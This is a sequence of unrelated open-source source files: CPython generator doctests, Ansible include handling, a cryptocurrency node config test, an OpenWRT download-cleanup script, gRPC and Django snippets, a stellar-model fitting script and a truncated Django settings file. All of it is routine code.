print(n, len(all), all[0] == [0] * n, all[-1] == [1] * n) 0 1 True True 1 2 True True 2 4 True True 3 8 True True 4 16 True True 5 32 True True 6 64 True True 7 128 True True 8 256 True True 9 512 True True And run an 8-queens solver. >>> q = Queens(8) >>> LIMIT = 2 >>> count = 0 >>> for row2col in q.solve(): ... count += 1 ... if count <= LIMIT: ... print("Solution", count) ... q.printsolution(row2col) Solution 1 +-+-+-+-+-+-+-+-+ |Q| | | | | | | | +-+-+-+-+-+-+-+-+ | | | | |Q| | | | +-+-+-+-+-+-+-+-+ | | | | | | | |Q| +-+-+-+-+-+-+-+-+ | | | | | |Q| | | +-+-+-+-+-+-+-+-+ | | |Q| | | | | | +-+-+-+-+-+-+-+-+ | | | | | | |Q| | +-+-+-+-+-+-+-+-+ | |Q| | | | | | | +-+-+-+-+-+-+-+-+ | | | |Q| | | | | +-+-+-+-+-+-+-+-+ Solution 2 +-+-+-+-+-+-+-+-+ |Q| | | | | | | | +-+-+-+-+-+-+-+-+ | | | | | |Q| | | +-+-+-+-+-+-+-+-+ | | | | | | | |Q| +-+-+-+-+-+-+-+-+ | | |Q| | | | | | +-+-+-+-+-+-+-+-+ | | | | | | |Q| | +-+-+-+-+-+-+-+-+ | | | |Q| | | | | +-+-+-+-+-+-+-+-+ | |Q| | | | | | | +-+-+-+-+-+-+-+-+ | | | | |Q| | | | +-+-+-+-+-+-+-+-+ >>> print(count, "solutions in all.") 92 solutions in all. And run a Knight's Tour on a 10x10 board. Note that there are about 20,000 solutions even on a 6x6 board, so don't dare run this to exhaustion. >>> k = Knights(10, 10) >>> LIMIT = 2 >>> count = 0 >>> for x in k.solve(): ... count += 1 ... if count <= LIMIT: ... print("Solution", count) ... k.printsolution(x) ... else: ... 
break Solution 1 +---+---+---+---+---+---+---+---+---+---+ | 1| 58| 27| 34| 3| 40| 29| 10| 5| 8| +---+---+---+---+---+---+---+---+---+---+ | 26| 35| 2| 57| 28| 33| 4| 7| 30| 11| +---+---+---+---+---+---+---+---+---+---+ | 59|100| 73| 36| 41| 56| 39| 32| 9| 6| +---+---+---+---+---+---+---+---+---+---+ | 74| 25| 60| 55| 72| 37| 42| 49| 12| 31| +---+---+---+---+---+---+---+---+---+---+ | 61| 86| 99| 76| 63| 52| 47| 38| 43| 50| +---+---+---+---+---+---+---+---+---+---+ | 24| 75| 62| 85| 54| 71| 64| 51| 48| 13| +---+---+---+---+---+---+---+---+---+---+ | 87| 98| 91| 80| 77| 84| 53| 46| 65| 44| +---+---+---+---+---+---+---+---+---+---+ | 90| 23| 88| 95| 70| 79| 68| 83| 14| 17| +---+---+---+---+---+---+---+---+---+---+ | 97| 92| 21| 78| 81| 94| 19| 16| 45| 66| +---+---+---+---+---+---+---+---+---+---+ | 22| 89| 96| 93| 20| 69| 82| 67| 18| 15| +---+---+---+---+---+---+---+---+---+---+ Solution 2 +---+---+---+---+---+---+---+---+---+---+ | 1| 58| 27| 34| 3| 40| 29| 10| 5| 8| +---+---+---+---+---+---+---+---+---+---+ | 26| 35| 2| 57| 28| 33| 4| 7| 30| 11| +---+---+---+---+---+---+---+---+---+---+ | 59|100| 73| 36| 41| 56| 39| 32| 9| 6| +---+---+---+---+---+---+---+---+---+---+ | 74| 25| 60| 55| 72| 37| 42| 49| 12| 31| +---+---+---+---+---+---+---+---+---+---+ | 61| 86| 99| 76| 63| 52| 47| 38| 43| 50| +---+---+---+---+---+---+---+---+---+---+ | 24| 75| 62| 85| 54| 71| 64| 51| 48| 13| +---+---+---+---+---+---+---+---+---+---+ | 87| 98| 89| 80| 77| 84| 53| 46| 65| 44| +---+---+---+---+---+---+---+---+---+---+ | 90| 23| 92| 95| 70| 79| 68| 83| 14| 17| +---+---+---+---+---+---+---+---+---+---+ | 97| 88| 21| 78| 81| 94| 19| 16| 45| 66| +---+---+---+---+---+---+---+---+---+---+ | 22| 91| 96| 93| 20| 69| 82| 67| 18| 15| +---+---+---+---+---+---+---+---+---+---+ """ weakref_tests = """\ Generators are weakly referencable: >>> import weakref >>> def gen(): ... yield 'foo!' ... 
>>> wr = weakref.ref(gen) >>> wr() is gen True >>> p = weakref.proxy(gen) Generator-iterators are weakly referencable as well: >>> gi = gen() >>> wr = weakref.ref(gi) >>> wr() is gi True >>> p = weakref.proxy(gi) >>> list(p) ['foo!'] """ coroutine_tests = """\ Sending a value into a started generator: >>> def f(): ... print((yield 1)) ... yield 2 >>> g = f() >>> next(g) 1 >>> g.send(42) 42 2 Sending a value into a new generator produces a TypeError: >>> f().send("foo") Traceback (most recent call last): ... TypeError: can't send non-None value to a just-started generator Yield by itself yields None: >>> def f(): yield >>> list(f()) [None] An obscene abuse of a yield expression within a generator expression: >>> list((yield 21) for i in range(4)) [21, None, 21, None, 21, None, 21, None] And a more sane, but still weird usage: >>> def f(): list(i for i in [(yield 26)]) >>> type(f()) <class 'generator'> A yield expression with augmented assignment. >>> def coroutine(seq): ... count = 0 ... while count < 200: ... count += yield ... seq.append(count) >>> seq = [] >>> c = coroutine(seq) >>> next(c) >>> print(seq) [] >>> c.send(10) >>> print(seq) [10] >>> c.send(10) >>> print(seq) [10, 20] >>> c.send(10) >>> print(seq) [10, 20, 30] Check some syntax errors for yield expressions: >>> f=lambda: (yield 1),(yield 2) Traceback (most recent call last): ... SyntaxError: 'yield' outside function >>> def f(): return lambda x=(yield): 1 Traceback (most recent call last): ... SyntaxError: 'return' with argument inside generator >>> def f(): x = yield = y Traceback (most recent call last): ... SyntaxError: assignment to yield expression not possible >>> def f(): (yield bar) = y Traceback (most recent call last): ... SyntaxError: can't assign to yield expression >>> def f(): (yield bar) += y Traceback (most recent call last): ... SyntaxError: can't assign to yield expression Now check some throw() conditions: >>> def f(): ... while True: ... try: ... print((yield)) ... 
except ValueError as v: ... print("caught ValueError (%s)" % (v)) >>> import sys >>> g = f() >>> next(g) >>> g.throw(ValueError) # type only caught ValueError () >>> g.throw(ValueError("xyz")) # value only caught ValueError (xyz) >>> g.throw(ValueError, ValueError(1)) # value+matching type caught ValueError (1) >>> g.throw(ValueError, TypeError(1)) # mismatched type, rewrapped caught ValueError (1) >>> g.throw(ValueError, ValueError(1), None) # explicit None traceback caught ValueError (1) >>> g.throw(ValueError(1), "foo") # bad args Traceback (most recent call last): ... TypeError: instance exception may not have a separate value >>> g.throw(ValueError, "foo", 23) # bad args Traceback (most recent call last): ... TypeError: throw() third argument must be a traceback object >>> g.throw("abc") Traceback (most recent call last): ... TypeError: exceptions must be classes or instances deriving from BaseException, not str >>> g.throw(0) Traceback (most recent call last): ... TypeError: exceptions must be classes or instances deriving from BaseException, not int >>> g.throw(list) Traceback (most recent call last): ... TypeError: exceptions must be classes or instances deriving from BaseException, not type >>> def throw(g,exc): ... try: ... raise exc ... except: ... g.throw(*sys.exc_info()) >>> throw(g,ValueError) # do it with traceback included caught ValueError () >>> g.send(1) 1 >>> throw(g,TypeError) # terminate the generator Traceback (most recent call last): ... TypeError >>> print(g.gi_frame) None >>> g.send(2) Traceback (most recent call last): ... StopIteration >>> g.throw(ValueError,6) # throw on closed generator Traceback (most recent call last): ... ValueError: 6 >>> f().throw(ValueError,7) # throw on just-opened generator Traceback (most recent call last): ... ValueError: 7 Now let's try closing a generator: >>> def f(): ... try: yield ... except GeneratorExit: ... 
print("exiting") >>> g = f() >>> next(g) >>> g.close() exiting >>> g.close() # should be no-op now >>> f().close() # close on just-opened generator should be fine >>> def f(): yield # an even simpler generator >>> f().close() # close before opening >>> g = f() >>> next(g) >>> g.close() # close normally And finalization: >>> def f(): ... try: yield ... finally: ... print("exiting") >>> g = f() >>> next(g) >>> del g exiting GeneratorExit is not caught by except Exception: >>> def f(): ... try: yield ... except Exception: ... print('except') ... finally: ... print('finally') >>> g = f() >>> next(g) >>> del g finally Now let's try some ill-behaved generators: >>> def f(): ... try: yield ... except GeneratorExit: ... yield "foo!" >>> g = f() >>> next(g) >>> g.close() Traceback (most recent call last): ... RuntimeError: generator ignored GeneratorExit >>> g.close() Our ill-behaved code should be invoked during GC: >>> import sys, io >>> old, sys.stderr = sys.stderr, io.StringIO() >>> g = f() >>> next(g) >>> del g >>> sys.stderr.getvalue().startswith( ... "Exception RuntimeError: 'generator ignored GeneratorExit' in " ... ) True >>> sys.stderr = old And errors thrown during closing should propagate: >>> def f(): ... try: yield ... except GeneratorExit: ... raise TypeError("fie!") >>> g = f() >>> next(g) >>> g.close() Traceback (most recent call last): ... TypeError: fie! Ensure that various yield expression constructs make their enclosing function a generator: >>> def f(): x += yield >>> type(f()) <class 'generator'> >>> def f(): x = yield >>> type(f()) <class 'generator'> >>> def f(): lambda x=(yield): 1 >>> type(f()) <class 'generator'> >>> def f(): x=(i for i in (yield) if (yield)) >>> type(f()) <class 'generator'> >>> def f(d): d[(yield "a")] = d[(yield "b")] = 27 >>> data = [1,2] >>> g = f(data) >>> type(g) <class 'generator'> >>> g.send(None) 'a' >>> data [1, 2] >>> g.send(0) 'b' >>> data [27, 2] >>> try: g.send(1) ... 
except StopIteration: pass >>> data [27, 27] """ refleaks_tests = """ Prior to adding cycle-GC support to itertools.tee, this code would leak references. We add it to the standard suite so the routine refleak-tests would trigger if it starts being uncleanable again. >>> import itertools >>> def leak(): ... class gen: ... def __iter__(self): ... return self ... def __next__(self): ... return self.item ... g = gen() ... head, tail = itertools.tee(g) ... g.item = head ... return head >>> it = leak() Make sure to also test the involvement of the tee-internal teedataobject, which stores returned items. >>> item = next(it) This test leaked at one point due to generator finalization/destruction. It was copied from Lib/test/leakers/test_generator_cycle.py before the file was removed. >>> def leak(): ... def gen(): ... while True: ... yield g ... g = gen() >>> leak() This test isn't really generator related, but rather exception-in-cleanup related. The coroutine tests (above) just happen to cause an exception in the generator's __del__ (tp_del) method. We can also test for this explicitly, without generators. We do have to redirect stderr to avoid printing warnings and to doublecheck that we actually tested what we wanted to test. >>> import sys, io >>> old = sys.stderr >>> try: ... sys.stderr = io.StringIO() ... class Leaker: ... def __del__(self): ... raise RuntimeError ... ... l = Leaker() ... del l ... err = sys.stderr.getvalue().strip() ... err.startswith( ... "Exception RuntimeError: RuntimeError() in <" ... ) ... err.endswith("> ignored") ... len(err.splitlines()) ... finally: ... sys.stderr = old True True 1 These refleak tests should perhaps be in a testfile of their own, test_generators just happened to be the test that drew these out. 
""" __test__ = {"tut": tutorial_tests, "pep": pep_tests, "email": email_tests, "fun": fun_tests, "syntax": syntax_tests, "conjoin": conjoin_tests, "weakref": weakref_tests, "coroutine": coroutine_tests, "refleaks": refleaks_tests, } # Magic test name that regrtest.py invokes *after* importing this module. # This worms around a bootstrap problem. # Note that doctest and regrtest both look in sys.argv for a "-v" argument, # so this works as expected in both ways of running regrtest. def test_main(verbose=None): from test import support, test_generators support.run_doctest(test_generators, verbose) # This part isn't needed for regrtest, but for running the test directly. if __name__ == "__main__": test_main(1)
Alberto-Beralix/Beralix
refs/heads/master
i386-squashfs-root/usr/lib/python2.7/dist-packages/papyon/gnet/proxy/abstract.py
2
../../../../../../share/pyshared/papyon/gnet/proxy/abstract.py
smiller171/ansible
refs/heads/devel
lib/ansible/playbook/included_file.py
7
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os from ansible.errors import AnsibleError from ansible.template import Templar class IncludedFile: def __init__(self, filename, args, task): self._filename = filename self._args = args self._task = task self._hosts = [] def add_host(self, host): if host not in self._hosts: self._hosts.append(host) def __eq__(self, other): return other._filename == self._filename and other._args == self._args def __repr__(self): return "%s (%s): %s" % (self._filename, self._args, self._hosts) @staticmethod def process_include_results(results, tqm, iterator, loader, variable_manager): included_files = [] for res in results: if res._task.action == 'include': if res._task.loop: if 'results' not in res._result: continue include_results = res._result['results'] else: include_results = [ res._result ] for include_result in include_results: # if the task result was skipped or failed, continue if 'skipped' in include_result and include_result['skipped'] or 'failed' in include_result: continue original_task = iterator.get_original_task(res._host, res._task) task_vars = variable_manager.get_vars(loader=loader, play=iterator._play, host=res._host, task=original_task) 
templar = Templar(loader=loader, variables=task_vars) include_variables = include_result.get('include_variables', dict()) if 'item' in include_result: task_vars['item'] = include_variables['item'] = include_result['item'] if original_task: if original_task._task_include: # handle relative includes by walking up the list of parent include # tasks and checking the relative result to see if it exists parent_include = original_task._task_include while parent_include is not None: parent_include_dir = templar.template(os.path.dirname(parent_include.args.get('_raw_params'))) include_target = templar.template(include_result['include']) if original_task._role: new_basedir = os.path.join(original_task._role._role_path, 'tasks', parent_include_dir) include_file = loader.path_dwim_relative(new_basedir, 'tasks', include_target) else: include_file = loader.path_dwim_relative(loader.get_basedir(), parent_include_dir, include_target) if os.path.exists(include_file): break else: parent_include = parent_include._task_include elif original_task._role: include_target = templar.template(include_result['include']) include_file = loader.path_dwim_relative(original_task._role._role_path, 'tasks', include_target) else: include_file = loader.path_dwim(include_result['include']) else: include_file = loader.path_dwim(include_result['include']) include_file = templar.template(include_file) inc_file = IncludedFile(include_file, include_variables, original_task) try: pos = included_files.index(inc_file) inc_file = included_files[pos] except ValueError: included_files.append(inc_file) inc_file.add_host(res._host) return included_files
chaincoin/chaincoin
refs/heads/0.18
test/functional/feature_includeconf.py
19
#!/usr/bin/env python3 # Copyright (c) 2018 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Tests the includeconf argument Verify that: 1. adding includeconf to the configuration file causes the includeconf file to be loaded in the correct order. 2. includeconf cannot be used as a command line argument. 3. includeconf cannot be used recursively (ie includeconf can only be used from the base config file). 4. multiple includeconf arguments can be specified in the main config file. """ import os from test_framework.test_framework import BitcoinTestFramework class IncludeConfTest(BitcoinTestFramework): def set_test_params(self): self.setup_clean_chain = False self.num_nodes = 1 def setup_chain(self): super().setup_chain() # Create additional config files # - tmpdir/node0/relative.conf with open(os.path.join(self.options.tmpdir, "node0", "relative.conf"), "w", encoding="utf8") as f: f.write("uacomment=relative\n") # - tmpdir/node0/relative2.conf with open(os.path.join(self.options.tmpdir, "node0", "relative2.conf"), "w", encoding="utf8") as f: f.write("uacomment=relative2\n") with open(os.path.join(self.options.tmpdir, "node0", "bitcoin.conf"), "a", encoding='utf8') as f: f.write("uacomment=main\nincludeconf=relative.conf\n") def run_test(self): self.log.info("-includeconf works from config file. subversion should end with 'main; relative)/'") subversion = self.nodes[0].getnetworkinfo()["subversion"] assert subversion.endswith("main; relative)/") self.log.info("-includeconf cannot be used as command-line arg") self.stop_node(0) self.nodes[0].assert_start_raises_init_error(extra_args=["-includeconf=relative2.conf"], expected_msg="Error parsing command line arguments: -includeconf cannot be used from commandline; -includeconf=relative2.conf") self.log.info("-includeconf cannot be used recursively. 
subversion should end with 'main; relative)/'") with open(os.path.join(self.options.tmpdir, "node0", "relative.conf"), "a", encoding="utf8") as f: f.write("includeconf=relative2.conf\n") self.start_node(0) subversion = self.nodes[0].getnetworkinfo()["subversion"] assert subversion.endswith("main; relative)/") self.stop_node(0, expected_stderr="warning: -includeconf cannot be used from included files; ignoring -includeconf=relative2.conf") self.log.info("-includeconf cannot contain invalid arg") # Commented out as long as we ignore invalid arguments in configuration files #with open(os.path.join(self.options.tmpdir, "node0", "relative.conf"), "w", encoding="utf8") as f: # f.write("foo=bar\n") #self.nodes[0].assert_start_raises_init_error(expected_msg="Error reading configuration file: Invalid configuration value foo") self.log.info("-includeconf cannot be invalid path") os.remove(os.path.join(self.options.tmpdir, "node0", "relative.conf")) self.nodes[0].assert_start_raises_init_error(expected_msg="Error reading configuration file: Failed to include configuration file relative.conf") self.log.info("multiple -includeconf args can be used from the base config file. subversion should end with 'main; relative; relative2)/'") with open(os.path.join(self.options.tmpdir, "node0", "relative.conf"), "w", encoding="utf8") as f: # Restore initial file contents f.write("uacomment=relative\n") with open(os.path.join(self.options.tmpdir, "node0", "bitcoin.conf"), "a", encoding='utf8') as f: f.write("includeconf=relative2.conf\n") self.start_node(0) subversion = self.nodes[0].getnetworkinfo()["subversion"] assert subversion.endswith("main; relative; relative2)/") if __name__ == '__main__': IncludeConfTest().main()
bnewbold/openwrt
refs/heads/rooter
scripts/dl_cleanup.py
131
#!/usr/bin/env python """ # OpenWRT download directory cleanup utility. # Delete all but the very last version of the program tarballs. # # Copyright (c) 2010 Michael Buesch <mb@bu3sch.de> """ import sys import os import re import getopt # Commandline options opt_dryrun = False def parseVer_1234(match, filepath): progname = match.group(1) progversion = (int(match.group(2)) << 64) |\ (int(match.group(3)) << 48) |\ (int(match.group(4)) << 32) |\ (int(match.group(5)) << 16) return (progname, progversion) def parseVer_123(match, filepath): progname = match.group(1) try: patchlevel = match.group(5) except (IndexError), e: patchlevel = None if patchlevel: patchlevel = ord(patchlevel[0]) else: patchlevel = 0 progversion = (int(match.group(2)) << 64) |\ (int(match.group(3)) << 48) |\ (int(match.group(4)) << 32) |\ patchlevel return (progname, progversion) def parseVer_12(match, filepath): progname = match.group(1) try: patchlevel = match.group(4) except (IndexError), e: patchlevel = None if patchlevel: patchlevel = ord(patchlevel[0]) else: patchlevel = 0 progversion = (int(match.group(2)) << 64) |\ (int(match.group(3)) << 48) |\ patchlevel return (progname, progversion) def parseVer_r(match, filepath): progname = match.group(1) progversion = (int(match.group(2)) << 64) return (progname, progversion) def parseVer_ymd(match, filepath): progname = match.group(1) progversion = (int(match.group(2)) << 64) |\ (int(match.group(3)) << 48) |\ (int(match.group(4)) << 32) return (progname, progversion) def parseVer_GIT(match, filepath): progname = match.group(1) st = os.stat(filepath) progversion = int(st.st_mtime) << 64 return (progname, progversion) extensions = ( ".tar.gz", ".tar.bz2", ".orig.tar.gz", ".orig.tar.bz2", ".zip", ".tgz", ".tbz", ) versionRegex = ( (re.compile(r"(.+)[-_]([0-9a-fA-F]{40,40})"), parseVer_GIT), # xxx-GIT_SHASUM (re.compile(r"(.+)[-_](\d+)\.(\d+)\.(\d+)\.(\d+)"), parseVer_1234), # xxx-1.2.3.4 (re.compile(r"(.+)[-_](\d\d\d\d)-?(\d\d)-?(\d\d)"), 
parseVer_ymd), # xxx-YYYY-MM-DD (re.compile(r"(.+)[-_](\d+)\.(\d+)\.(\d+)(\w?)"), parseVer_123), # xxx-1.2.3a (re.compile(r"(.+)[-_](\d+)_(\d+)_(\d+)"), parseVer_123), # xxx-1_2_3 (re.compile(r"(.+)[-_](\d+)\.(\d+)(\w?)"), parseVer_12), # xxx-1.2a (re.compile(r"(.+)[-_]r?(\d+)"), parseVer_r), # xxx-r1111 ) blacklist = [ ("linux", re.compile(r"linux-.*")), ("gcc", re.compile(r"gcc-.*")), ("wl_apsta", re.compile(r"wl_apsta.*")), (".fw", re.compile(r".*\.fw")), (".arm", re.compile(r".*\.arm")), (".bin", re.compile(r".*\.bin")), ("rt-firmware", re.compile(r"RT[\d\w]+_Firmware.*")), ] class EntryParseError(Exception): pass class Entry: def __init__(self, directory, filename): self.directory = directory self.filename = filename self.progname = "" self.fileext = "" for ext in extensions: if filename.endswith(ext): filename = filename[0:0-len(ext)] self.fileext = ext break else: print self.filename, "has an unknown file-extension" raise EntryParseError("ext") for (regex, parseVersion) in versionRegex: match = regex.match(filename) if match: (self.progname, self.version) = parseVersion( match, directory + "/" + filename + self.fileext) break else: print self.filename, "has an unknown version pattern" raise EntryParseError("ver") def deleteFile(self): path = (self.directory + "/" + self.filename).replace("//", "/") print "Deleting", path if not opt_dryrun: os.unlink(path) def __eq__(self, y): return self.filename == y.filename def __ge__(self, y): return self.version >= y.version def usage(): print "OpenWRT download directory cleanup utility" print "Usage: " + sys.argv[0] + " [OPTIONS] <path/to/dl>" print "" print " -d|--dry-run Do a dry-run. 
Don't delete any files" print " -B|--show-blacklist Show the blacklist and exit" print " -w|--whitelist ITEM Remove ITEM from blacklist" def main(argv): global opt_dryrun try: (opts, args) = getopt.getopt(argv[1:], "hdBw:", [ "help", "dry-run", "show-blacklist", "whitelist=", ]) if len(args) != 1: usage() return 1 except getopt.GetoptError: usage() return 1 directory = args[0] for (o, v) in opts: if o in ("-h", "--help"): usage() return 0 if o in ("-d", "--dry-run"): opt_dryrun = True if o in ("-w", "--whitelist"): for i in range(0, len(blacklist)): (name, regex) = blacklist[i] if name == v: del blacklist[i] break else: print "Whitelist error: Item", v,\ "is not in blacklist" return 1 if o in ("-B", "--show-blacklist"): for (name, regex) in blacklist: print name return 0 # Create a directory listing and parse the file names. entries = [] for filename in os.listdir(directory): if filename == "." or filename == "..": continue for (name, regex) in blacklist: if regex.match(filename): if opt_dryrun: print filename, "is blacklisted" break else: try: entries.append(Entry(directory, filename)) except (EntryParseError), e: pass # Create a map of programs progmap = {} for entry in entries: if entry.progname in progmap.keys(): progmap[entry.progname].append(entry) else: progmap[entry.progname] = [entry,] # Traverse the program map and delete everything but the last version for prog in progmap: lastVersion = None versions = progmap[prog] for version in versions: if lastVersion is None or version >= lastVersion: lastVersion = version if lastVersion: for version in versions: if version != lastVersion: version.deleteFile() if opt_dryrun: print "Keeping", lastVersion.filename return 0 if __name__ == "__main__": sys.exit(main(sys.argv))
Dexhub/MTX
refs/heads/master
ext/ply/ply/__init__.py
838
# PLY package # Author: David Beazley (dave@dabeaz.com) __all__ = ['lex','yacc']
JoeWoo/grpc
refs/heads/master
src/python/grpcio_test/grpc_test/_adapter/_c_test.py
17
# Copyright 2015, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
import time import unittest from grpc._adapter import _c from grpc._adapter import _types class CTypeSmokeTest(unittest.TestCase): def testCompletionQueueUpDown(self): completion_queue = _c.CompletionQueue() del completion_queue def testServerUpDown(self): completion_queue = _c.CompletionQueue() serv = _c.Server(completion_queue, []) del serv del completion_queue def testChannelUpDown(self): channel = _c.Channel('[::]:0', []) del channel if __name__ == '__main__': unittest.main(verbosity=2)
jacobajit/ion
refs/heads/master
intranet/apps/events/notifications.py
1
# -*- coding: utf-8 -*- from django.conf import settings from django.core.urlresolvers import reverse from ..notifications.emails import email_send def event_approval_request(request, event): subject = "Event Approval Request from {}".format(event.user) emails = [settings.APPROVAL_EMAIL] base_url = request.build_absolute_uri(reverse('index')) data = {"event": event, "info_link": request.build_absolute_uri(reverse("event", args=[event.id])), "base_url": base_url} email_send("events/emails/admin_approve.txt", "events/emails/admin_approve.html", data, subject, emails)
nonsk131/USRP2016
refs/heads/master
fitMultinest_triplet.py
1
import matplotlib matplotlib.use('Agg') from isochrones.dartmouth import Dartmouth_Isochrone from isochrones.starmodel import StarModel from isochrones.observation import ObservationTree import pandas as pd import matplotlib.pyplot as plt import sys #from mpi4py import MPI #comm = MPI.COMM_WORLD #rank = comm.Get_rank() def get_index(n): if n < 10: return '000' + str(n) elif n < 100: return '00' + str(n) elif n < 1000: return '0' + str(n) else: return str(n) n = sys.argv[1] i = get_index(n) df = pd.read_csv('/tigress/np5/dataFrame/df_triplet_test{}.csv'.format(i)) #------------------------------------------------------------------------------- #triplet0 - all in same system dar = Dartmouth_Isochrone() t = ObservationTree.from_df(df, name='test{}'.format(i)) t.define_models(dar) mod = StarModel(dar, obs=t) mod.fit_multinest(n_live_points=1000, basename='/tigress/np5/chains/test{}_triplet0'.format(i)) #if rank == 0: f1 = open('/tigress/np5/evidence_triplet0.txt','a') evi = mod.evidence evi = str(evi) f1.write('case{}: '.format(i) + evi + '\n') f1.close() fig = mod.corner_physical(props=['mass', 'distance', 'AV']) fig.savefig('/tigress/np5/figures/test{}_triplet0_corner_physical.png'.format(i)) plt.close(fig) fig = mod.corner_observed() fig.savefig('/tigress/np5/figures/test{}_triplet0_corner_observed.png'.format(i)) plt.close(fig) #------------------------------------------------------------------------------- #triplet1 - M1,M2 bound - M3 unbound dar = Dartmouth_Isochrone() t = ObservationTree.from_df(df, name='test{}'.format(i)) t.define_models(dar, index=[0,0,1]) mod = StarModel(dar, obs=t) mod.fit_multinest(n_live_points=1000, basename='/tigress/np5/chains/test{}_triplet1'.format(i)) #if rank == 0: f1 = open('/tigress/np5/evidence_triplet1.txt','a') evi = mod.evidence evi = str(evi) f1.write('case{}: '.format(i) + evi + '\n') f1.close() fig = mod.corner_physical(props=['mass', 'distance', 'AV']) 
fig.savefig('/tigress/np5/figures/test{}_triplet1_corner_physical.png'.format(i)) plt.close(fig) fig = mod.corner_observed() fig.savefig('/tigress/np5/figures/test{}_triplet1_corner_observed.png'.format(i)) plt.close(fig) #------------------------------------------------------------------------------- #triplet2 - M1,M3 bound - M2 unbound dar = Dartmouth_Isochrone() t = ObservationTree.from_df(df, name='test{}'.format(i)) t.define_models(dar, index=[0,1,0]) mod = StarModel(dar, obs=t) mod.fit_multinest(n_live_points=1000, basename='/tigress/np5/chains/test{}_triplet2'.format(i)) #if rank == 0: f1 = open('/tigress/np5/evidence_triplet2.txt','a') evi = mod.evidence evi = str(evi) f1.write('case{}: '.format(i) + evi + '\n') f1.close() fig = mod.corner_physical(props=['mass', 'distance', 'AV']) fig.savefig('/tigress/np5/figures/test{}_triplet2_corner_physical.png'.format(i)) plt.close(fig) fig = mod.corner_observed() fig.savefig('/tigress/np5/figures/test{}_triplet2_corner_observed.png'.format(i)) plt.close(fig) #------------------------------------------------------------------------------- #triplet3 - M2,M3 bound - M1 unbound dar = Dartmouth_Isochrone() t = ObservationTree.from_df(df, name='test{}'.format(i)) t.define_models(dar, index=[0,1,1]) mod = StarModel(dar, obs=t) mod.fit_multinest(n_live_points=1000, basename='/tigress/np5/chains/test{}_triplet3'.format(i)) #if rank == 0: f1 = open('/tigress/np5/evidence_triplet3.txt','a') evi = mod.evidence evi = str(evi) f1.write('case{}: '.format(i) + evi + '\n') f1.close() fig = mod.corner_physical(props=['mass', 'distance', 'AV']) fig.savefig('/tigress/np5/figures/test{}_triplet3_corner_physical.png'.format(i)) plt.close(fig) fig = mod.corner_observed() fig.savefig('/tigress/np5/figures/test{}_triplet3_corner_observed.png'.format(i)) plt.close(fig) #------------------------------------------------------------------------------- #triplet4 - M1,M2,M3 all unbound dar = Dartmouth_Isochrone() t = ObservationTree.from_df(df, 
name='test{}'.format(i)) t.define_models(dar, index=[0,1,2]) mod = StarModel(dar, obs=t) mod.fit_multinest(n_live_points=1000, basename='/tigress/np5/chains/test{}_triplet4'.format(i)) #if rank == 0: f1 = open('/tigress/np5/evidence_triplet4.txt','a') evi = mod.evidence evi = str(evi) f1.write('case{}: '.format(i) + evi + '\n') f1.close() fig = mod.corner_physical(props=['mass', 'distance', 'AV']) fig.savefig('/tigress/np5/figures/test{}_triplet4_corner_physical.png'.format(i)) plt.close(fig) fig = mod.corner_observed() fig.savefig('/tigress/np5/figures/test{}_triplet4_corner_observed.png'.format(i)) plt.close(fig)
tardisgallifrey/python
refs/heads/master
hello.py
1
#!/usr/bin/python print "hello world"
xNUTs/PTVS
refs/heads/master
Python/Tests/TestData/DjangoProjectWithSubDirectory/project/config/settings.py
18
# Django settings for DjangoProjectWithSubDirectory project. DEBUG = True TEMPLATE_DEBUG = DEBUG ADMINS = ( # ('Your Name', 'your_email@example.com'), ) MANAGERS = ADMINS DATABASES = { 'default': { 'ENGINE': 'django.db.backends.', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'. 'NAME': '', # Or path to database file if using sqlite3. 'USER': '', # Not used with sqlite3. 'PASSWORD': '', # Not used with sqlite3. 'HOST': '', # Set to empty string for localhost. Not used with sqlite3. 'PORT': '', # Set to empty string for default. Not used with sqlite3. } } # Local time zone for this installation. Choices can be found here: # http://en.wikipedia.org/wiki/List_of_tz_zones_by_name # although not all choices may be available on all operating systems. # On Unix systems, a value of None will cause Django to use the same # timezone as the operating system. # If running in a Windows environment this must be set to the same as your # system time zone. TIME_ZONE = 'America/Chicago' # Language code for this installation. All choices can be found here: # http://www.i18nguy.com/unicode/language-identifiers.html LANGUAGE_CODE = 'en-us' SITE_ID = 1 # If you set this to False, Django will make some optimizations so as not # to load the internationalization machinery. USE_I18N = True # If you set this to False, Django will not format dates, numbers and # calendars according to the current locale. 